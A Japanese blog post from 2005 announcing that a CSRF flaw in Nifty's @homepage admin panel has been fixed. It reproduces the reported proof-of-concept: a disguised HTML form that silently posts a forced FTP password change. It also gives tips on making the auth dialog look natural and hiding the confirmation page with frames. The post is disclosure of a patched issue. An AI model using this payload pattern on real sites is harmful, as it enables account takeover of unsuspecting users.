CSRF 直った
2005年10月30日(日曜日)
CSRF 直った
ニフティ系のもろもろがいろいろ直ったという報告がありました。私は退会済みなので確認できませんが、まあ修正報告があったからには大丈夫でしょう。
「脆弱性届出状況2005年Q1」あたりで CSRF による強制パスワード変更の可能性について軽く臭わせることを書いていましたが、実際に「@homepage 管理画面において、CSRF 攻撃によって FTP のパスワードが強制変更される」というものを届け出ていたのでした。届出に記載していた PoC コードはこんな感じ。
<form action="https://homepage.nifty.com/cgi-bin/HP_ChangePW.cgi" method="POST">
<p>例の話ですが、ニフティ会員の方は以下で見られます (要パスワード)。</p>
<input type="hidden" name="DISP_PAGE" value="ftp200.htm">
<input type="hidden" name="FTPPASSWD" maxlength="8" size="15" value="XXXXXXXX">
<input type="hidden" name="NEWFTPPASSWD" maxlength="8" size="15" value="XXXXXXXX">
<input type="submit" style="background:transparent;border:none;text-decoration:underline;color:#00f;cursor:hand" value="例の話詳細">
</form>
押すと、Basic 認証のダイアログが出ます (既にログイン済みでなければ、ですが)。そこで素直にパスワードを入れると、パスワード変更完了画面が表示されて後の祭りです。
※まあ、パスワード変更完了画面を見られてしまうとばれてしまうので、本気で攻撃 (!?) する場合には完了画面をうまく隠す必要があるでしょう。フレームを使うなど、カモフラージュの方法はいくらでもあります。
昔ニフティには「インターウェイ」という Web インターフェイスがあって、フォーラムの発言などを Web 上で閲覧することができるようになっていました。そのアクセス制御には Basic 認証が使われていました。そんなわけなので、「ニフティの会員制のコンテンツですよー」と断ってリンクを書いておくと、Basic 認証のダイアログが出てきても不自然さが微塵もないという。
これの他にもいろいろと直ったらしいですね。お疲れ様でした。
- 「CSRF 直った」にコメントを書く
関連する話題: セキュリティ / ニフティ / CSRF / 情報セキュリティ早期警戒パートナーシップ
- 前(古い): 間違いだらけの個人情報保護ブログ
- 次(新しい): うまくいかなかった事例
